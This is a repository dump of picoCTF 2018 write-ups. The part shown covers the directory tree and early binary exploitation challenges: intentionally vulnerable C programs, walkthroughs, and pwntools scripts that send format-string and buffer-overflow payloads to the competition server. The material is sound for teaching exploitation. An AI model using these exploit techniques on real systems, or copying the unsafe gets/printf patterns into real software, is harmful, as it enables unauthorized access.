Showing preview only (361K chars total). Download the full file or copy to clipboard to get everything.
Repository: PlatyPew/picoctf-2018-writeup
Branch: master
Commit: ad54bf8c5fc9
Files: 276
Total size: 302.3 KB
Directory structure:
gitextract_onc07rvn/
├── .gitmodules
├── Binary Exploitation/
│ ├── are you root?/
│ │ ├── README.md
│ │ └── files/
│ │ ├── auth
│ │ └── auth.c
│ ├── authenticate/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ └── solve.py
│ ├── buffer overflow 0/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── flag.txt
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── flag.txt
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── flag.txt
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── flag.txt
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 3/
│ │ ├── README.md
│ │ └── files/
│ │ ├── vuln
│ │ └── vuln.c
│ ├── can-you-gets-me/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── gets
│ │ │ └── gets.c
│ │ └── solution/
│ │ └── solve.py
│ ├── echo back/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── echoback
│ │ └── solution/
│ │ └── solve.py
│ ├── echooo/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── echo
│ │ │ └── echo.c
│ │ └── solution/
│ │ └── solve.py
│ ├── got-2-learn-libc/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ └── solve.py
│ ├── got-shell?/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ ├── auth
│ │ └── solve.py
│ ├── gps/
│ │ ├── README.md
│ │ └── files/
│ │ ├── gps
│ │ └── gps.c
│ ├── leak-me/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ └── solve.py
│ ├── rop chain/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── exp
│ │ │ ├── flag.txt
│ │ │ ├── rop
│ │ │ └── rop.c
│ │ └── solution/
│ │ └── solve.py
│ └── shellcode/
│ ├── README.md
│ ├── files/
│ │ ├── exploit
│ │ ├── vuln
│ │ └── vuln.c
│ └── solution/
│ └── solve.py
├── Cryptography/
│ ├── Crypto Warmup 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── table.txt
│ ├── Crypto Warmup 2/
│ │ └── README.md
│ ├── HEEEEEEERE'S Johnny!/
│ │ ├── README.md
│ │ └── files/
│ │ ├── passwd
│ │ └── shadow
│ ├── James Brahm Returns/
│ │ ├── README.md
│ │ └── files/
│ │ └── source.py
│ ├── Magic Padding Oracle/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── pkcs7.py
│ │ └── solution/
│ │ ├── requirements.txt
│ │ └── solution.py
│ ├── Safe RSA/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── ciphertext
│ │ └── solution/
│ │ └── solve.py
│ ├── SpyFi/
│ │ ├── README.md
│ │ └── files/
│ │ └── spy_terminal_no_flag.py
│ ├── Super Safe RSA/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ └── solve.py
│ ├── Super Safe RSA 2/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ ├── solve.py
│ │ └── wienerAttack/
│ │ ├── Arithmetic.py
│ │ ├── ContinuedFractions.py
│ │ ├── RSAwienerHacker.py
│ │ └── __init__.py
│ ├── Super Safe RSA 3/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ └── solve.py
│ ├── blaise's cipher/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ ├── caesar cipher 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── ciphertext
│ ├── caesar cipher 2/
│ │ ├── README.md
│ │ └── files/
│ │ └── ciphertext
│ ├── hertz/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ ├── hertz 2/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ └── rsa-madlibs/
│ ├── README.md
│ └── solution/
│ └── solve.py
├── Forensics/
│ ├── Desrouleaux/
│ │ ├── README.md
│ │ └── files/
│ │ └── incidents.json
│ ├── Ext Super Magic/
│ │ ├── README.md
│ │ └── files/
│ │ └── ext-super-magic.img
│ ├── Forensics Warmup 1/
│ │ └── README.md
│ ├── Forensics Warmup 2/
│ │ └── README.md
│ ├── LoadSomeBits/
│ │ └── README.md
│ ├── Lying Out/
│ │ └── README.md
│ ├── Malware Shops/
│ │ ├── README.md
│ │ └── files/
│ │ └── info.txt
│ ├── Reading Between the Eyes/
│ │ └── README.md
│ ├── Recovering From the Snap/
│ │ ├── README.md
│ │ └── files/
│ │ └── animals.dd
│ ├── Truly an Artist/
│ │ └── README.md
│ ├── What's My Name?/
│ │ ├── README.md
│ │ └── files/
│ │ └── myname.pcap
│ ├── admin panel/
│ │ ├── README.md
│ │ └── files/
│ │ └── admin_panel.pcap
│ ├── core/
│ │ ├── README.md
│ │ └── files/
│ │ ├── core
│ │ └── print_flag
│ ├── hex editor/
│ │ └── README.md
│ └── now you don't/
│ └── README.md
├── General Skills/
│ ├── Aca-Shell-A/
│ │ └── README.md
│ ├── Dog or Frog/
│ │ └── README.md
│ ├── General Warmup 1/
│ │ └── README.md
│ ├── General Warmup 2/
│ │ └── README.md
│ ├── General Warmup 3/
│ │ └── README.md
│ ├── Resources/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ └── resources
│ ├── absolutely relative/
│ │ ├── README.md
│ │ └── files/
│ │ ├── absolutely-relative
│ │ ├── absolutely-relative.c
│ │ └── permission.txt
│ ├── environ/
│ │ └── README.md
│ ├── grep 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── file
│ ├── grep 2/
│ │ └── README.md
│ ├── in out error/
│ │ ├── README.md
│ │ └── files/
│ │ └── in-out-error
│ ├── learn gdb/
│ │ ├── README.md
│ │ └── files/
│ │ └── run
│ ├── net cat/
│ │ └── README.md
│ ├── pipe/
│ │ └── README.md
│ ├── roulette/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── roulette
│ │ │ └── roulette.c
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── generate.c
│ │ └── solve.py
│ ├── script me/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ ├── ssh-keyz/
│ │ └── README.md
│ ├── store/
│ │ ├── README.md
│ │ └── files/
│ │ ├── source.c
│ │ └── store
│ ├── strings/
│ │ ├── README.md
│ │ └── files/
│ │ └── strings
│ ├── what base is this?/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ └── you can't see me/
│ └── README.md
├── README.md
├── Reversing/
│ ├── Radix's Terminal/
│ │ └── README.md
│ ├── Reversing Warmup 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── run
│ ├── Reversing Warmup 2/
│ │ └── README.md
│ ├── assembly-0/
│ │ ├── README.md
│ │ └── files/
│ │ └── intro_asm_rev.S
│ ├── assembly-1/
│ │ ├── README.md
│ │ └── files/
│ │ └── eq_asm_rev.S
│ ├── assembly-2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── loop_asm_rev.S
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── loop.s
│ │ ├── solve.c
│ │ └── solve.sh
│ ├── assembly-3/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── end_asm_rev.S
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── end.s
│ │ ├── solve.c
│ │ └── solve.sh
│ ├── assembly-4/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── Makefile
│ │ │ └── comp.nasm
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── comp.nasm
│ │ └── solve.sh
│ ├── be-quick-or-be-dead-1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-1
│ │ └── solution/
│ │ └── be-quick-or-be-dead-1_patched
│ ├── be-quick-or-be-dead-2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-2
│ │ └── solution/
│ │ ├── be-quick-or-be-dead-2_patched
│ │ └── calculate.py
│ ├── be-quick-or-be-dead-3/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-3
│ │ └── solution/
│ │ ├── be-quick-or-be-dead-3
│ │ └── solve.py
│ ├── keygen-me-1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── activate
│ │ └── solution/
│ │ └── test.c
│ ├── quackme/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── main
│ │ └── solution/
│ │ └── solve.py
│ ├── quackme up/
│ │ ├── README.md
│ │ └── files/
│ │ └── main
│ └── special-pw/
│ ├── README.md
│ └── files/
│ └── special_pw.S
├── Web Exploitation/
│ ├── A Simple Question/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── answer2.phps
│ │ └── index.html
│ ├── Artisinal Handcrafted HTTP 3/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ ├── Buttons/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── boo.html
│ │ ├── button1.php
│ │ └── index.html
│ ├── Client Side is Still Bad/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ └── index.html
│ ├── Flaskcards/
│ │ └── README.md
│ ├── Flaskcards Skeleton Key/
│ │ └── README.md
│ ├── Help Me Reset 2/
│ │ └── README.md
│ ├── Inspect Me/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ ├── index.html
│ │ ├── mycss.css
│ │ └── myjs.js
│ ├── Irish Name Repo/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ ├── login.html
│ │ └── support.html
│ ├── LambDash 3/
│ │ └── README.md
│ ├── Logon/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ └── logout
│ ├── Mr. Robots/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ ├── robots.txt
│ │ └── style.css
│ ├── No Login/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── flag
│ │ ├── index.html
│ │ └── unimplemented
│ ├── Secret Agent/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── flag
│ │ ├── index.html
│ │ └── unimplemented
│ ├── Secure Logon/
│ │ ├── README.md
│ │ └── files/
│ │ └── server_noflag.py
│ ├── The Vault/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ └── login.txt
│ └── fancy-alive-monitoring/
│ ├── README.md
│ └── solution/
│ ├── solve.py
│ └── source/
│ ├── index.php
│ └── index.txt
├── _config.yml
└── template/
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitmodules
================================================
[submodule "Binary Exploitation/can-you-gets-me/solution/ROPgadget"]
path = Binary Exploitation/can-you-gets-me/solution/ROPgadget
url = https://github.com/JonathanSalwan/ROPgadget.git
[submodule "Cryptography/Super Safe RSA/solution/msieve"]
path = Cryptography/Super Safe RSA/solution/msieve
url = https://github.com/radii/msieve.git
[submodule "Cryptography/Super Safe RSA 3/solution/msieve"]
path = Cryptography/Super Safe RSA 3/solution/msieve
url = https://github.com/radii/msieve.git
================================================
FILE: Binary Exploitation/are you root?/README.md
================================================
# are you root?
Points: 550
## Category
Binary Exploitation
## Question
>Can you get root access through this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 29508`. [Source](files/auth.c).
### Hint
>If only the program used calloc to zero out the memory..
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Binary Exploitation/are you root?/files/auth.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
typedef enum auth_level {
ANONYMOUS = 1,
GUEST = 2,
USER = 3,
ADMIN = 4,
ROOT = 5
} auth_level_t;
struct user {
char *name;
auth_level_t level;
};
void give_flag(){
char flag[48];
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
if ((fgets(flag, 48, f)) == NULL){
puts("Couldn't read flag file.");
exit(1);
};
puts(flag);
fclose(f);
}
void menu(){
puts("Available commands:");
puts("\tshow - show your current user and authorization level");
puts("\tlogin [name] - log in as [name]");
puts("\tset-auth [level] - set your authorization level (must be below 5)");
puts("\tget-flag - print the flag (requires authorization level 5)");
puts("\treset - log out and reset authorization level");
puts("\tquit - exit the program");
}
int main(int argc, char **argv){
char buf[512];
char *arg;
uint32_t level;
struct user *user;
setbuf(stdout, NULL);
menu();
user = NULL;
while(1){
puts("\nEnter your command:");
putchar('>'); putchar(' ');
if(fgets(buf, 512, stdin) == NULL)
break;
if (!strncmp(buf, "show", 4)){
if(user == NULL){
puts("Not logged in.");
}else{
printf("Logged in as %s [%u]\n", user->name, user->level);
}
}else if (!strncmp(buf, "login", 5)){
if (user != NULL){
puts("Already logged in. Reset first.");
continue;
}
arg = strtok(&buf[6], "\n");
if (arg == NULL){
puts("Invalid command");
continue;
}
user = (struct user *)malloc(sizeof(struct user));
if (user == NULL) {
puts("malloc() returned NULL. Out of Memory\n");
exit(-1);
}
user->name = strdup(arg);
printf("Logged in as \"%s\"\n", arg);
}else if(!strncmp(buf, "set-auth", 8)){
if(user == NULL){
puts("Login first.");
continue;
}
arg = strtok(&buf[9], "\n");
if (arg == NULL){
puts("Invalid command");
continue;
}
level = strtoul(arg, NULL, 10);
if (level >= 5){
puts("Can only set authorization level below 5");
continue;
}
user->level = level;
printf("Set authorization level to \"%u\"\n", level);
}else if(!strncmp(buf, "get-flag", 8)){
if (user == NULL){
puts("Login first!");
continue;
}
if (user->level != 5){
puts("Must have authorization level 5.");
continue;
}
give_flag();
}else if(!strncmp(buf, "reset", 5)){
if (user == NULL){
puts("Not logged in!");
continue;
}
free(user->name);
user = NULL;
puts("Logged out!");
}else if(!strncmp(buf, "quit", 4)){
return 0;
}else{
puts("Invalid option");
menu();
}
}
}
================================================
FILE: Binary Exploitation/authenticate/README.md
================================================
# authenticate
Points: 350
## Category
Binary Exploitation
## Question
>Can you [authenticate](files/auth) to this service and get the flag? Connect with nc 2018shell1.picoctf.com 27114. [Source](files/auth.c).
### Hint
>What happens if you say something OTHER than yes or no?
## Solution
Looking at the source code, there appears to be some sort of authentication service, with no actual way to authenticate.
We can see that there's an _authenticated_ variable, which is set to _0_, and never changed anywhere in the code. We also notice that there is possibly a form of format string vulnerability.
```c
int main(int argc, char **argv) {
char buf[64];
printf("Would you like to read the flag? (yes/no)\n");
fgets(buf, sizeof(buf), stdin);
if (strstr(buf, "no") != NULL) {
printf("Okay, Exiting...\n");
exit(1);
}
else if (strstr(buf, "yes") == NULL) {
puts("Received Unknown Input:\n");
printf(buf); // Format String Vulnerability
}
read_flag();
}
```
We can try running the binary and inputting _%x_ to see if any values from the stack leaks.
```
$ ./auth
Would you like to read the flag? (yes/no)
%x%x
Received Unknown Input:
80489a6f7f235c0
Sorry, you are not *authenticated*!
```
Let's find out where the authenticated varialbe is located and its corresponding value.
```
[0x08048560]> s obj.authenticated
[0x0804a04c]> px 4
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0804a04c 0000 0000 ....
[0x0804a04c]> s
0x804a04c
```
Looks like it's located at _0x804a04c_ with a value of _0_. Let's craft an exploit. We add characters with familiar know hex values followed by multiple _%x_
```
$ ./auth
Would you like to read the flag? (yes/no)
AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
Received Unknown Input:
AAAA 80489a6 f7f5b5c0 804875a 0 c30000 0 fffd3ff4 0 0 0 41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 Sorry, you are not *authenticated*!
```
Looks like the 11th _%x_ did the trick. Now substitue _AAAA_ with the little endian values of the _authenticated_ variable's address and all the _%x_ with _%11$n_. This will overwrite the value of _authenticated_.
Send the exploit to the service and get the flag.
Working solution [solve.py](solution/solve.py).
### Flag
`picoCTF{y0u_4r3_n0w_aUtH3nt1c4t3d_742b49a4}`
================================================
FILE: Binary Exploitation/authenticate/files/auth.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
int authenticated = 0;
int flag() {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag, sizeof(flag), file);
printf("%s", flag);
return 0;
}
void read_flag() {
if (!authenticated) {
printf("Sorry, you are not *authenticated*!\n");
}
else {
printf("Access Granted.\n");
flag();
}
}
int main(int argc, char **argv) {
setvbuf(stdout, NULL, _IONBF, 0);
char buf[64];
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
printf("Would you like to read the flag? (yes/no)\n");
fgets(buf, sizeof(buf), stdin);
if (strstr(buf, "no") != NULL) {
printf("Okay, Exiting...\n");
exit(1);
}
else if (strstr(buf, "yes") == NULL) {
puts("Received Unknown Input:\n");
printf(buf);
}
read_flag();
}
================================================
FILE: Binary Exploitation/authenticate/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
from time import sleep
import re
auth_addr = p32(0x0804a04c)
exploit = auth_addr + '%11$n'
log.info('Exploit created')
s = remote('2018shell1.picoctf.com', 27114)
print s.recv()
log.info('Sending exploit...')
s.sendline(exploit)
sleep(0.5)
log.info('Sent!')
flag = s.recv()
log.success('Flag: ' + re.findall(r'(picoCTF\{.+\})', flag)[0])
================================================
FILE: Binary Exploitation/buffer overflow 0/README.md
================================================
# buffer overflow 0
Points: 150
## Category
Binary Exploitation
## Question
>Let's start off simple, can you overflow the right buffer in this [program](files/vuln) to get the flag? You can also find it in /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d on the shell server. [Source](files/vuln.c).
### Hint
>How can you trigger the flag to print?
>
>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
## Solution
We can try pwning the binary locally first. Firstly, create a file _flag.txt_ and add some contents into it.
Do a sample run of the program.
```
$ ./vuln
This program takes 1 argument.
```
Ok, now we try with an argument
```
$ ./vuln AAAA
Thanks! Received: AAAA
```
Seems like it's redirecting the input into output. Let's take a look at the source code.
```c
// Imports here...
// Define flag size here...
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[16];
strcpy(buf, input);
}
int main(int argc, char **argv){
// Reading flag here...
signal(SIGSEGV, sigsegv_handler);
// gid settings here...
if (argc > 1) {
vuln(argv[1]);
printf("Thanks! Received: %s", argv[1]);
}
else
printf("This program takes 1 argument.\n");
return 0;
}
```
It looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.
In `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.
We can try running the program again, but this time, with a lot more characters.
```
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
picoCTF{sample_flag}
```
We did it locally! It takes 28 or more bytes to leak out the flag.
All we have to do is send it to the webshell.
```
$ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}
```
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`
================================================
FILE: Binary Exploitation/buffer overflow 0/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[16];
strcpy(buf, input);
}
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
if (argc > 1) {
vuln(argv[1]);
printf("Thanks! Received: %s", argv[1]);
}
else
printf("This program takes 1 argument.\n");
return 0;
}
================================================
FILE: Binary Exploitation/buffer overflow 0/solution/flag.txt
================================================
picoCTF{sample_flag}
================================================
FILE: Binary Exploitation/buffer overflow 0/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
USER = 'Platy' # Change username accordingly.
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
exploit = 'A' * 28
py = s.run('cd /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d; ./vuln {}'.format(exploit))
print py.recv()
s.close()
================================================
FILE: Binary Exploitation/buffer overflow 1/README.md
================================================
# buffer overflow 1
Points: 200
## Category
Binary Exploitation
## Question
>Okay now you're cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78 on the shell server. Source.
### Hint
>This time you're actually going to have to control that return address!
>
>Make sure you consider Big Endian vs Little Endian.
## Solution
Before looking at the source code, we can run the program first.
```
$ ./vuln
Please enter your string:
AAAA
Okay, time to return... Fingers Crossed... Jumping to 0x80486b3
```
Looks like it takes in an input, and jumps to an address. Let's look at the source code now.
```c
// Imports here...
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
// Reading flag file
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
// Unimportant stuff
puts("Please enter your string: ");
vuln();
return 0;
}
```
We can see that the address that it shows us is the return address, which should be the address of _main_. If we do a buffer overflow, we can take control of the return address, and let the program jump to wherever we want.
In this case, we would like to jump to the _win_ function, which prints out the flag.
Let's try spamming the program again to see if our hunch is correct.
```
$ ./vuln
Please enter your string:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Okay, time to return... Fingers Crossed... Jumping to 0x41414141
Segmentation fault
```
The return address has been overwritten to _0x41414141_, which is the hex value of _A_. As long as we can find the correct amount of padding, we can control the where the return pointer returns to.
We can use the [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence), which will find the padding we need. We will use _pwntools_.
```python
>>> from pwn import *
>>> cyclic(100)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
```
We can now feed that string into the program and see what address the program jumps to.
```
$ ./vuln
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Okay, time to return... Fingers Crossed... Jumping to 0x6161616c
Segmentation fault
```
Ok, it jumps to _0x6161616c_. We can use `cyclic_find()` to find the offset. First we convert the hex back into ASCII. Remember that this is in little endian format. `p32()` just converts the hex back into ASCII in little endian format.
```python
>>> from pwn import *
>>> cyclic_find(p32(0x6161616c))
44
```
Now we know the amount of padding required. Let's test it again, with 44 'A's, and another 4 'B's. We should expect the address to show _0x41414141_.
```
$ ./vuln
Please enter your string:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Okay, time to return... Fingers Crossed... Jumping to 0x42424242
Segmentation fault
```
Just as we expected. All that's left to do is to replace _BBBB_ with the ASCII values that corresponds to the address of the _win_ function.
```python
>>> from pwn import *
>>> vuln = ELF('./vuln')
[*] '/root/Desktop/picoCTF/Binary Exploitation/buffer overflow 1/solution/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
>>> p32(vuln.symbols['win']) # Get address of win function
'\xcb\x85\x04\x08'
>>> 'A' * 44 + '\xcb\x85\x04\x08'
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xcb\x85\x04\x08'
```
Of course, we cannot type _\xcb\x85\x04\x08_ in ASCII format, so all we have to do is have Python output this string, and pipe it into the program _vuln_.
```
$ python -c "from pwn import *; print 'A' * 44 + '\xcb\x85\x04\x08'" | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{sample_flag}
Segmentation fault
```
Great! It works locally, all we have to do now is run it on the web shell.
```
$ cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78
$ python -c "from pwn import *; print 'A' * 44 + '\xcb\x85\x04\x08'" | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy65489706}Segmentation fault
```
And we get the flag!
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{addr3ss3s_ar3_3asy65489706}`
================================================
FILE: Binary Exploitation/buffer overflow 1/files/flag.txt
================================================
picoCTF{addr3ss3s_ar3_3asy65489706}
================================================
FILE: Binary Exploitation/buffer overflow 1/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
================================================
FILE: Binary Exploitation/buffer overflow 1/solution/flag.txt
================================================
picoCTF{sample_flag}
================================================
FILE: Binary Exploitation/buffer overflow 1/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
import os
PATH = os.path.dirname(os.path.realpath(__file__))
USER = 'Platy' # Change username accordingly.
vuln = ELF(PATH + '/vuln')
padding = 'A' * 44
payload = p32(vuln.symbols['win'])
exploit = padding + payload
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
py = s.run('cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78; ./vuln')
print py.recv()
py.sendline(exploit)
print py.recv()
s.close()
================================================
FILE: Binary Exploitation/buffer overflow 2/README.md
================================================
# buffer overflow 2
Points: 250
## Category
Binary Exploitation
## Question
>Alright, this time you'll need to control some arguments. Can you get the flag from this [program](files/vuln)? You can find it in /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4 on the shell server. [Source](files/vuln.c).
### Hint
>Try using gdb to print out the stack once you write to it!
## Solution
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{addr3ss3s_ar3_3asyada28e9b}`
================================================
FILE: Binary Exploitation/buffer overflow 2/files/flag.txt
================================================
picoCTF{addr3ss3s_ar3_3asyada28e9b}
================================================
FILE: Binary Exploitation/buffer overflow 2/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xDEADBEEF)
return;
if (arg2 != 0xDEADC0DE)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
================================================
FILE: Binary Exploitation/buffer overflow 2/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
vuln = ELF('./vuln')
padding = 'A' * 112
payload = p32(vuln.symbols['win'])
exploit = padding + payload + asm('nop') * 4 + p32(0xDEADBEEF) + p32(0xDEADC0DE)
s = ssh(host='2018shell1.picoctf.com', user='Platy')
py = s.run('cd /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4; ./vuln')
print py.recv()
py.sendline(exploit)
print py.recv()
s.close()
================================================
FILE: Binary Exploitation/buffer overflow 3/README.md
================================================
